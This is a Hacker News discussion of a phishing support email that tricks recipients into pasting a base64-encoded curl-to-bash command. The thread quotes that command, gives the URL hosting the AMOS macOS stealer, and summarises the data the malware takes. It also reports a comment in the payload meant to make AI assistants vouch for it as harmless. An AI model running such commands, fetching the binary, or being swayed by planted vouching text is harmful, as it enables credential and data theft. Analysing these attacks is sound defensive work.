The Scariest "User Support" Email I've Received
Posted 3 months ago · Active 2 months ago
Source: devas.life · Tech story · High profile
Heated/mixed debate · 80/100
Key topics: Phishing, Cybersecurity, Malware, AI-Powered Attacks
A developer shares a "scary" user support email that contained a phishing attack, sparking a discussion on the sophistication of modern phishing attacks and the role of AI in amplifying their effectiveness.
Snapshot generated from the HN discussion
Discussion Activity
Very active discussion · First comment after 6d · Peak period: 138 comments (Day 6) · Avg per period: 32
Comment distribution: 160 data points (based on 160 loaded comments)
Key moments
- Story posted: Oct 15, 2025 at 4:47 AM EDT (3 months ago)
- First comment: Oct 20, 2025 at 5:36 PM EDT (6d after posting)
- Peak activity: 138 comments on Day 6, the hottest window of the conversation
- Latest activity: Oct 26, 2025 at 8:36 PM EDT (2 months ago)
ID: 45589715 · Type: story · Last synced: 11/20/2025, 8:28:07 PM
lol we are so cooked
Before LLMs, someone who wasn't familiar with deobfuscation had no easy way to analyse the attack string the way they were able to here.
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
A couple of times per month I give Gemini a try at work, and it is good at some things and bad at others. If there is a confusing compiler error, it will usually point me in the right direction faster than I could figure it out myself.
However, when it tries to debug a complex problem it jumps from conclusion to conclusion: “a-ha, now I DEFINITELY understand the problem”. Sometimes it has an OK idea (worth checking out, but not conclusive yet), and sometimes it has very bad ideas. Most times, after I humor it by gathering further info that debunks its hypotheses, it gives up.
The command even mentions base64.
What if ChatGPT said everything is fine?
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years' worth of bash scripting knowledge - any time I think "I could take 5min and write that" an LLM can do it in under 30 seconds and adds a lot more input validation checks than I would in 5min. It also gets the regex right the first time, which is better than my grug brain for anything non-trivial.
And I truly hope nobody needs ChatGPT to tell them that running an unknown curl command is a very bad idea.
The problem is the waste of resources for such a simple task. No wonder we need so many more power plants.
Again, I am an AI skeptic and hate the power usage, but it's obvious why people turn to it in this scenario.
Maybe ChatGPT can execute malicious code but that also seems less likely to be my problem.
When I come across obviously malicious payloads I get a little paranoid. I don't know why copy-pasting it somewhere might cause a problem, but ChatGPT is something where I'm pretty confident it won't do an RCE on my machine. I have less confidence if I'm pasting it into a browser or shell tool. I guess maybe writing a python script where the base64 is hardcoded, that seems pretty safe, but I don't know what the person spear phishing me has thought of or how well resourced they are.
That makes no sense.
If you think that there's obvious answers to what is and isn't safe here I think you're not paranoid enough. Everything carries risk and some of it depends on what I know; some tools might be more or less useful depending on what I know how to do with them, so your set of tools that are worth the risk are going to be different from mine.
I don't think so, I feel like the built-in echo and base64 commands are obviously safer than ChatGPT
Decoded:
This isn't exactly obfuscated: download an executable file, make it executable, then execute it. I remember tons of "what's this JS/PHP blob I found in my WordPress site" posts back in the day that were generally more obfuscated than a single base64 pass.
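The decode step the commenter describes is easy to reproduce locally without an LLM. The blob below is a harmless stand-in (not the real payload, and example.com is a placeholder host); the point is to print the decoded command instead of ever piping it to a shell:

```python
import base64

# Harmless stand-in for the attacker's blob; the real one decoded to a
# curl-pipe-to-bash one-liner. example.com is a placeholder, not the real host.
blob = base64.b64encode(b"curl -sL https://example.com/x | bash").decode()

# Decode and *print* the command instead of executing it.
decoded = base64.b64decode(blob).decode()
print(decoded)
```

Dropping the `| bash` stage and just reading the output is the whole trick.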
Absolutely not.
I just wasted 4 hours trying to debug an issue because a developer decided they would shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist I realised it was created by an LLM instead of a developer.
LLMs can only create convincing looking code. They don't actually understand what they are writing, they are just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
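The "hash each chunk into an ID" idea in that last sentence can be sketched roughly like this (a minimal illustration with made-up names, not the project's actual code):

```python
import hashlib

def chunk_id(chunk: bytes) -> str:
    # Content-addressed ID: the same bytes always yield the same ID, so the
    # upstream data source never needs to carry IDs of its own.
    return hashlib.sha256(chunk).hexdigest()[:16]

record = b'{"name": "widget", "qty": 3}'
rid = chunk_id(record)
```

Deriving stable, collision-resistant IDs from the data itself sidesteps the "data source doesn't have IDs" problem entirely.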
The “we’re cooked” refers to the fact of using ChatGPT to decode the base64 command.
That’s like using ChatGPT to solve a simple equation like 4*12, especially for a developer. There are tons of base64 decoders if you don’t want to write that one-liner yourself.
No wonder we need a lot more power plants, never mind how much CO2 is released just to build them. No wonder we make no real progress on stopping climate change.
What about the everything machine called brain?
Imagine being this way. Hence "we're cooked".
May anyone do it for me? Use "otool", "dtruss", and "tcpdump" or something. :D Be careful!
The executable is available here: https://www.amanagencies.com/assets/js/grecaptcha as per the decoded base64.
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. I posted a bit more analysis here: https://news.ycombinator.com/item?id=45650144
> AMOS is designed for broad data theft, capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.
[0] https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
Got anything better? :D Something that may be worth getting macOS for!
Edit: I have some ideas to make this one better, for example, or to make a new one from scratch. I really want to see how mine would fare against security researchers (or anyone interested). Any ideas where to start? I would like to give them a binary to analyze and figure out what it does. :D I have a couple of friends who are bounty hunters and work in opsec, but I wonder if there is a place (e.g. IRC or Matrix channel) for like-minded, curious individuals. :)
If the LLM takes it upon itself to download malware, the user is protected.
lol we are so cooked
This guy makes an app and had to use a chatbot to do a base64 decode?
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'...
Isn't it just basic problem-solving skill? We gonna let AI do the thinky bit for us now?
https://news.ycombinator.com/item?id=45591707
We definitely need AI lessons in school or something. Maybe some kind of mandatory quiz before you can access ChatGPT.
Not so smart, after all.
Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
Come to think of it... you are right! The barrier to entry was higher yet we fell for it! Err, I did fall for it when I was around 10 or something. :D
And it doesn't have to work on everyone, just enough people to be worth the effort to try.
Enough that it's still a valid tactic.
I've seen these on compromised WordPress sites a lot. They copy the command to the clipboard and instruct the user to either open up PowerShell and paste it, or just paste it into the Win+R Run dialog.
These types of phishes have been around for a really long time.
Also, I’d bet the average site owner does not know what a terminal is. Think small business owners. Plus the thought of losing revenue because their site is unusable injects a level of urgency which means they’re less likely to stop and think about what they’re doing.
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
I don't think that was ever really a thing. Which isn't to say that no one did it, but it was never a common practice. And free web site hosting came earlier than you're implying - sites like Tripod and Angelfire launched in the mid-1990s, at a time when most users were still on dialup.
I find this 7-year-old comment particularly ironic: https://news.ycombinator.com/item?id=17931747
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
- E-mail is insecure. It can be read by any number of servers between you and the sender.
- Numerically, very few healthcare companies have the time, money, or talent to self-host a secure solution, so they farm it out to a third-party that offers specific guarantees, and very few of those permit self-hosting or even custom domains because that's a risk to them.
As someone who works in healthcare, I can say that if you invent a better system, you'll make millions.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
Personally I think the judge should have made the woman go outside first, but “inside a suspect’s house” is statistically more dangerous than a traffic stop, which is the second most dangerous place for a cop to be.
I was more thinking of soon-to-be political prisoners but there are a lot of situations that match what I said.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
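Single-byte XOR of the kind described is symmetric, so deobfuscation is the same operation as obfuscation. An illustrative sketch (the sample's real key and data layout aren't shown in the thread; the key and IP below are made up):

```python
def xor_bytes(data: bytes, key: int) -> bytes:
    # XOR is its own inverse: applying the same key twice round-trips the data.
    return bytes(b ^ key for b in data)

c2 = b"192.0.2.10"  # documentation IP, a stand-in for the real C2 address
obfuscated = xor_bytes(c2, 0x5A)
assert xor_bytes(obfuscated, 0x5A) == c2
```

This is why such obfuscation only defeats casual string searches, not an analyst with the binary in hand.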
Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
Far from an expert myself, but I don't think this attack is directed at Windows users. I don't think Windows even has base64 as a command by default?
It involves no CMD though, it's basically just Win+R -> CTRL+V -> Enter
What's more baffling is that I also haven't heard of any Android malware that does this, despite most phones out there having several publicly known exploits and many phones not receiving any updates.
I can't really explain it except "social engineering like this works so well and is so much simpler that nobody bothers anymore".
But yes, zero days are too valuable to waste on random targets. Doesn't mean it never happens.
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d immediately be scared away by the command-line aspect of it.
The amount of legitimate reasons to ever open a link in a support email is basically zero.
When you have a company policy enforced by training and/or technology there is no thought involved, you just respond with “sorry, we can’t open external links. Please attach your screenshot to [ticketing system].”
Your ticketing/email system can literally remove all links automatically right?
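A crude version of that automatic link removal could look like the following (a naive regex sketch for illustration; real mail gateways typically rewrite or quarantine links rather than pattern-match them out):

```python
import re

# Match http/https URLs up to the next whitespace character.
URL_RE = re.compile(r"https?://\S+")

def strip_links(body: str) -> str:
    # Replace every URL in an inbound support email with a placeholder.
    return URL_RE.sub("[link removed]", body)

print(strip_links("See https://evil.example/verify for the screenshot"))
```

Even this blunt approach forces the sender back to the sanctioned channel (attachments in the ticketing system) instead of arbitrary external links.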
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
When I design my phishing links, I'll try to embed instructions for chatbots to suggest they're safe.
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
This is what it put in my clipboard for me to paste:
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without hurting yourself is very easy. I don't know if OP is really a dev or in the support department, but either way, as a customer I would be worried. Hint: just remove the " | bash" and you will easily see what the attacker tried to make you execute.
Just a different way of spreading the malware.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
Really? You need ChatGPT to help you decode a base64 string into the plain-text command it's masking?
Just based on that, I'd question the quality of the app that was targeted and wouldn't really trust it with any data.
No it didn't. It starts with "sites.google.com"
92 more comments available on Hacker News